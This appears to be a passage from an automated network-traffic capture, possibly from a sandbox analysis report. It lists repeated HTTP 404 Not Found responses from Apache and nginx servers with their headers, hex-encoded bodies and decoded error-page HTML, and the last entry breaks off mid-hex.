                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:05 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:08 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:10 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:18 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:20 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:23 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 09 Dec 2024 05:58:26 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Mon, 09 Dec 2024 05:58:33 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 564 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 05:58:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 